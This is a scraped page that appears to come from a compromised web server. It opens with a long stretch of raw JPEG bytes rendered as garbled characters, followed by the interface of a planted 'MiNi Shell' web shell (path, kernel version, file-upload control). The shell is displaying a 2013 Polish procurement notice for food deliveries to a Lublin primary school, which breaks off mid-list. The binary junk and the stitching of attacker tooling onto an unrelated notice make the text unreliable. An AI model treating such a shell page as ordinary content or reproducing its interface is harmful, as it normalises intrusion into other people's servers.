JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130701/252636-N-2013.html

<p class="kh_header"><b>Lublin: Zakup i dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 252636 - 2013; data zamieszczenia: 01.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 28 , ul. Radości 13, 20-530 Lublin, woj. lubelskie, tel. 0-81 5339272, faks 0-81 5339272.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp28.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postanowienia ogólne:
Na przedmiot zamówienia składa się sukcesywny zakup i dostawa artykułów żywnościowych  dla potrzeb stołówki Szkoły Podstawowej nr 28 w Lublinie.
		Postanowienia szczegółowe: 


OPIS PRZEDMIOTU ZAMÓWIENIA
NA DOSTAWĘ ARTYKUŁÓW ŻYWNOŚCIOWYCH

Nazwa i kody stosowane we Wspólnym Słowniku Zamówień (CPV):
CPV : 15000000-8
Szczegółowe wymagania związane z realizacją przedmiotu zamówienia :

	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych dla potrzeb stołówki Szkoły Podstawowej nr 28 w Lublinie ul.Radości 13.
	Zamówienie na dostawę artykułów żywnościowych podzielone jest na następujące części :
Część Nr 1 Zamówienia:
Produkty zwierzęce, mięso i produkty mięsne - CPV 15100000-9
Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Szponder	kg	70
2.	Wołowina ekstra	kg	70
3.	Wołowina kl. II 	kg	250
4.	Mięso mielone wieprzowo - wołowe	kg	100
5.	Żeberka wieprzowe paski	kg	120
6.	Karczek wieprzowy bk	kg	550
7.	Łopatka wieprzowa bk	kg	650
8.	Schab wieprzowy bk	kg	350
9.	Wątroba wieprzowa	kg	70
10.	Kiełbasa biała	kg	150
11.	Bok wędzony	kg	260
12.	Parówki cielęce ekstra	kg	35
13.	Kiełbasa Podwawelska	kg	220
14.	Szynka wieprzowa gotowana	kg	30
15.	Mielonka Szynka Tyrolska 	kg	45
16.	Polędwica sopocka	kg	15
17.	Polędwica drobiowa	kg	20
18.	Filety z kurczaka pojedyncze	kg	150
19.	Filety z indyka	kg	330
20.	Udziec z kurczaka	kg	1250
21.	Korpusy drobiowe	kg	230
22.	Mięso drobiowe Ekstra kurczak	kg	350
23.	Smalec	kg	110
24.	Słonina	kg	60

Część Nr 2 Zamówienia:
Ryby mrożone, filety rybne i pozostałe mięso z ryb - CPV 15220000-6
Warzywa i owoce mrożone - CPV 15310000-4

Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Filety rybne mrożone miruna bez glazury	kg	550
2.	Konserwa rybna śledź w oleju	szt.	25
3.	Filet pstrąga świeży	kg	70
4.	Konserwa rybna makrela w oleju	szt.	25
5.	Fasola szparagowa żółta mrożona cięta	kg	30
6.	Fasola szparagowa zielona mrożona cięta	kg	250
7.	Mieszanka kompotowa mrożona	kg	90
8.	Kalafior mrożony polski	kg	50
9.	Truskawka mrożona	kg	140

Część Nr 3 Zamówienia:
Ziemniaki, warzywa, owoce świeże i przetworzone - CPV 15310000-4

Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Ziemniaki jadalne polskie workowane a30kg	kg	25 000
2.	Kapusta kwaszona	kg	1100
3.	Ogórek kiszony	kg	280
4.	Burak czerwony długi	kg	650
5.	Cebula czerwona	kg	30
6.	Cebula biała polska	kg	1350
6.	Czosnek główka polski	szt.	430
7.	Marchew korzeń polska	kg	2150
8.	Ogórek świeży	kg	360
9.	Pietruszka korzeń polska	kg	900
10.	Rzodkiewka pęczek min. 200g	pęczek	100
11.	Rzepa biała	kg	85
12.	Seler bulwa	kg	300
13.	Fasola Jaś duży	kg	250
14.	Fasola Jaś drobny	kg	50
15.	Groch łupany	kg	50
16.	Papryka świeża	kg	130
17.	Pomidor świeży	kg	230
18.	Brokuły	szt.	400
19.	Botwinka min. 350g	pęczek	60
20.	Kapusta pekińska	kg	280
21.	Kapusta czerwona	kg	150
22.	Kalafior świeży  	szt.	160
23.	Kapusta biała 	kg	400
24.	Kapusta młoda polska	szt.	300
25.	Koper pęczek min. 100g	pęczek	220
26.	Natka pietruszki pęczek min. 100g	pęczek	600
27.	Por	kg	140
28.	Szczaw	kg	30
29.	Szczypior pęczek min. 150g	pęczek	500
30.	Sałata masłowa główka min. 450g	szt.	670
31.	Pieczarka świeża	kg	200
32.	Fasola szparagowa żółta świeża	kg	40
33.	Fasola szparagowa zielona świeża	kg	100
34.	Banany	kg	800
35.	Gruszki polskie	kg	1000
36.	Jabłka polskie	kg	3000
37.	Maliny polskie	kg	100
38.	Mandarynki	kg	100
39.	Morele	kg	14
40.	Nektarynki	kg	20
41.	Pomarańcze	kg	600
42.	Śliwka węgierka	kg	30
43.	Truskawka świeża	kg	120
44.	Brzoskwinie	kg	150



Część Nr 4 Zamówienia:
Mleko, śmietana, nabiał - CPV 15510000-6

Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Mleko 2 %  butelka plastikowa	szt.	2250
2.	Śmietana 12% opakowanie 400g	szt.	490
3.	Serek topiony śmietanowy min. 100g	szt.	40
4.	Śmietana 30% opakowanie 400 g	szt.	160
5.	Masło kostka 200g	szt.	800
6.	Ser twarogowy półtłusty	kg	200
7.	Ser żółty twardy	kg	60
8.	Serek homogenizowany waniliowy 150 g	szt.	400
9.	Jogurt naturalny opak. 400 ml	szt.	20
10.	Jogurt owocowy opak  150 ml	szt.	4500
11.	Jogurt owocowy pitny min. 250 g butelka	szt.	4500
Część Nr 5 Zamówienia: 
Wyroby mączne garmażeryjne do gotowania i smażenia - CPV 15510000-6
Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Kopytka świeże	kg	600
2.	Kluski śląskie świeże	kg	400
3.	Pierogi wiejskie świeże	kg	800
4.	Pierogi z kapustą i pieczarkami	kg	180
5.	Pierogi z mięsem	kg	200
6.	Pierogi ruskie	kg	800
7.	Naleśniki	kg	400

Część Nr 6 Zamówienia:
Różne produkty spożywcze - CPV 15800000-6, 15310000-4, 15510000-6
Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Cukier a1kg	szt.	1300
2.	Cukier waniliowy 32g	szt.	80
3.	Miód naturalny słoik 300g polski	szt.	30
4.	Kakao rozpuszczalne 300g Puchatek	szt.	30
5.	Czekolada 200g	szt.	1300
6.	Cukierki czekoladowe Mieszanka Solidarność	kg	40
7.	Draże orzechowe 100g	szt.	450
8.	Herbata granulowana Lipton 100g	szt.	40
9.	Ocet spirytusowy 10% a0,5l	szt.	5
10.	Sos sałatkowo-koperkowy proszek a0,8 	szt.	10
11.	Sos grecki proszek a0,8 	szt.	10
12.	Sos pieczeniowy proszek a0,8 	szt.	15
13.	Sos boloński proszek a0,8 	szt.	10
14.	Sos grzybowy proszek a0,8 	szt.	5
15.	Majonez a3kg	szt.	15
16.	Przyprawa Apetita 0,2kg	szt.	600
17.	Papryka słodka 800g	szt.	10
18.	Papryka ostra 800g	szt.	8
19.	Pieprz ziołowy 700g	szt.	10
20.	Przyprawa do zup Maggi 960g	szt.	180
21.	Sól kuchenna a1kg	szt.	300
22.	Ziele angielskie 600g	szt.	10
23.	Zioła prowansalskie 300g	szt.	3
24.	Pieprz naturalny 800g	szt.	30
25.	Majeranek tarty 150g	szt.	20
26.	Liść laurowy 100g	szt.	50
27.	Kminek 550g	szt.	4
28.	Kwasek cytrynowy a1,3kg	szt.	20
29.	Vegeta 200g	szt.	600
30.	Barszcz czerwony koncentrat a1,4kg	szt.	20
31.	Rosół z kury w proszku 0,9kg	szt.	40
32.	Rosół wołowy w proszku 0,9kg	szt.	20
33.	Zupa brokułowa w proszku a1,3kg	szt.	10
34.	Zupa żur w proszku a1,3	szt.	15
35.	Zupa gulaszowa a1,3kg	szt.	10
36.	Marynata do drobiu 700g	szt.	30
37.	Marynata do wieprzowiny 700g	szt.	15
38.	Groszek konserwowy 400g polski	szt.	100
39.	Kukurydza konserwowa 340g polska	szt.	140
40.	Koncentrat pomidorowy 30% 300g Pudliszki	szt.	240
41.	Koncentrat pomidorowy 30% 1000g słoik Pudliszki	szt.	60
42.	Keczup 500g Pudliszki	szt.	5
43.	Chrzan słoik 370ml Rebok	szt.	30
44.	Dżem truskawkowy 280g	szt.	40
45.	Dżem brzoskwiniowy 280g	szt.	40
46.	Galaretka owocowa w proszku 1,3kg Winiary	szt.	30
47.	Pasta orzechowa do smarowania Nutella 400g	szt.	30
48.	Olej rzepakowy 0,9l	szt.	700
49.	Olej słonecznikowy 0,9l	szt.	300
50.	Brzoskwinie w syropie 450g	szt.	100
51.	Ananas w syropie 450g	szt.	60
52.	Napój owocowy w proszku 1kg	szt.	50
53.	Syropy owocowe bez konserwantów 430ml	szt.	600
54.	Soki owocowe w kartonie 200ml	szt.	1500
55.	Soki warzywno-owocowe karton 200ml 	szt.	900
56.	Ryż długoziarnisty biały a1kg	kg	100
57.	Ryż paraboliczny a5kg	kg	200
58.	Mąka pszenna tortowa a1kg	kg	600
59.	Mąka ziemniaczana a1kg	kg	30
60.	Jaja wielkość L	szt.	7000
61.	Płatki kukurydziane opak 0,50 kg	szt.	20
62.	Płatki owsiane opak 400g	szt.	15
63.	Płatki kulki czekoladowe opak. 0,5 kg	szt.	20
64.	Kasza manna a400g	szt.	6
65.	Kasza jęczmienna wiejska a1kg	kg	180
66.	Kasza gryczana a1 kg	kg	60
67.	Kawa zbożowa INKA opak 150g	szt.	10
68.	Makaron nitka cięta As babuni	kg	120
69.	Makaron świderek	kg	600
70.	Makaron kolanko z falbanką	kg	300
71.	Makaron łazanki	kg	150
72.	Wafelki w czekoladzie 50g	szt.	2500





Część Nr 7 Zamówienia:
Pieczywo świeże, wyroby piekarskie i cukiernicze - CPV 15810000-9

Lp.	Nazwa asortymentu	Jedn. miary	Ilość
1.	Chleb krojony pakowany waga co najmniej 550g	szt.	4000
2.	Rogal maślany	szt.	440
3.	Bułka Kajzerka	szt.	2600
4.	Parówka krojona pakowana waga co najmniej 500g	szt.	370
5.	Bułka tarta 	kg	400
6.	Drożdżówka z dżemem	szt.	440
7.	Gniazdko 	szt.	440
8.	Pączek 90g	szt.	1300


	Wykonawca może złożyć ofertę na jedną część lub więcej części zamówienia oddzielnie dla każdej części zamówienia.
	Wymagana jest należyta staranność przy realizacji przedmiotu zamówienia.
	Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie ze wszystkimi wymaganiami Zamawiającego wskazanymi w SIWZ.
	Wykonawca dostarczy artykuły żywnościowe spełniające wymogi określone przepisami ustawy z 25.08.2006r. o bezpieczeństwie żywności i żywienia oraz aktów wykonawczych do niej.
	Wykonawca dostarczy artykuły żywnościowe środkami transportu spełniającymi obowiązujące w dniu realizacji wymogi prawne.
	Zmiany ilościowe :
podane w opisie przedmiotu zamówienia ilości mogą zostać zmniejszone lub zwiększone o określoną wartość tj. : + - 5% , w celu dostosowania przedmiotu zamówienia do aktualnych potrzeb zamawiającego w okresie realizacji zamówienia.
   Miejsce dostawy / odbioru i transport :
miejscem dostawy jest magazyn zamawiającego znajdujący się przy Szkole Podstawowej nr 28 w Lublinie ul.Radości 13,
wykonawca dostarczy zamówione artykuły żywnościowe do magazynu zamawiającego na własny koszt i na własne ryzyko,
wykonawca dokona rozładunku zamówionego towaru do magazynu zamawiającego,
osobą upoważnioną do kontroli jakościowej dostarczonego towaru jest P,
po dokonaniu kontroli jakościowej dostarczonych produktów podpisany zostanie protokół zdawczo - odbiorczy,
w przypadku złej jakości dostarczonych produktów żywnościowych zamawiający nie dokona ich odbioru, a Wykonawca ma obowiązek niezwłocznie wymienić wadliwy towar na towar pełnowartościowy,
Zamawiający zastrzega sobie możliwość odmowy przyjęcia całej partii przedmiotu umowy lub odrzucenia jej części w przypadku, gdy w trakcie oceny wizualnej i organoleptycznej zostanie stwierdzona zła jakość produktów, widoczne uszkodzenia spowodowane niewłaściwym zabezpieczeniem produktów, złymi warunkami transportowymi lub niewłaściwym stanem higienicznym środków transportu przewożących przedmiot umowy,
Zamawiający zastrzega sobie prawo do oddania próbki partii dostawy do akredytowanego laboratorium w celu wykonania badań mikrobiologicznych,
Zamawiający zastrzega sobie możliwość odmowy przyjęcia partii przedmiotu umowy w przypadku niedotrzymania przez Wykonawcę określonego w umowie terminu realizacji partii,
przyjęcia partii przedmiotu umowy będą się odbywały zgodnie z procedurą określoną w dokumentacji sanitarnej, wg. zasad dobrej praktyki produkcyjnej GMP i dobrej praktyki higienicznej GHP,
przy dostawie każdej partii przedmiotu zamówienia Wykonawca musi załączyć świadectwa jakości dostarczanego przedmiotu umowy (atest) lub handlowy dokument identyfikacyjny oraz dokumentację pozwalającą na zidentyfikowanie źródła pochodzenia dostarczonej partii towaru /producent i  kraj pochodzenia/.
  Sposób realizacji dostaw :
dostawy będą realizowane na podstawie zamówień Zamawiającego przekazywanych Wykonawcy drogą elektroniczną, faksem lub telefonicznie / środki komunikacji wskazane w ofercie/,
w zamówieniach tych Zamawiający będzie określał dokładną ilość i rodzaj zamawianego asortymentu,
zamówienia mogą być składane codziennie w godzinach 8,00 - 13,00, z wyjątkiem dni ustawowo wolnych od pracy,
dostawy będą miały miejsce w dniu następnym po złożeniu zamówienia
 do godz. 7,00.
 Wymagania jakościowe / termin przydatności do spożycia :
wygląd, tekstura i konsystencja : charakterystyczna dla rodzaju i stopnia rozdrobnienia, konsystencja sypka, bez grudek, niezlepiająca się przy ucisku, bez zbryleń, delikatna,
smak  charakterystyczny dla rodzaju surowca, bez obcych posmaków, zapach  charakterystyczny dla rodzaju surowca, przyjemny, bez obcych zapachów,
 właściwości fizykochemiczne i biologiczne  brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz bakterii chorobotwórczych,
 opakowanie  torebki odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe, szczelne,
 wszystkie produkty muszą posiadać niezbędne dokumenty dotyczące badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosownymi przepisami i normami,
 w odniesieniu do warzyw  świeże, niezwiędłe, twarde, bez śladów zepsucia i pleśni, warzywa okopowe ponadto muszą być niepopękane, bez bocznych rozwidleń i rozgałęzień, jednolite pod względem wielkości i odmiany, ziemniaki po ugotowaniu muszą być sypkie, o białej lub kremowej barwie oraz przyjemnym zapachu, jabłka deserowe muszą być świeże, twarde, soczyste, niepoobijane, bez śladów zepsucia i pleśni, jednolite pod względem wielkości,
 termin przydatności do spożycia od chwili dostarczenia produktu do magazynu zamawiającego nie może być krótszy niż określony na opakowaniu towaru lub w odniesieniu do artykułów żywnościowych miękkich /nie pakowanych przez producenta, pakowane przez dostawcę/ zgodnie z praktyką ich użycia podania, przetworzenia.
 Opakowania 
 przedmiot umowy będzie dostarczany w opakowaniach oryginalnych, odpowiednio posortowany i zabezpieczony przed uszkodzeniem, w warunkach temperaturowych zalecanych przez producenta oraz czystym środkiem transportu przystosowanym do przewozu przedmiotu umowy.
  Sposób rozliczeń za zrealizowane dostawy
 rozliczenia pomiędzy Zamawiającym a Wykonawcą będą następowały w okresach tygodniowych, wg. cen jednostkowych przedstawionych w ofercie za 1 kg/szt. ,na podstawie faktury, która będzie określała ilość faktycznie i prawidłowo zrealizowanych dostaw,
 zamawiający określa termin płatności po wystawieniu faktury VAT przez Wykonawcę zgodnie z zasadą określona wyżej na minimum 14 dni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 15.31.00.00-4, 15.31.00.00-4, 15.51.00.00-6, 15.51.00.00-6, 15.80.00.00-6, 15.31.00.00-4, 15.51.00.00-6, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy zrealizowali w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 
2 dostawy o wartości brutto każdej dostawy nie mniejszej niż wartość brutto oferowana , które  zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia sytuacji ekonomicznej i finansowej Wykonawcy przedłożą opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych w wykonywanych głównych dostaw - 2 (dwie), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości (wartość brutto każdej dostawy nie mniejsza niż oferowana), przedmiotu, dat wykonania dostaw oraz podmiotów na rzecz których dostawy te zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
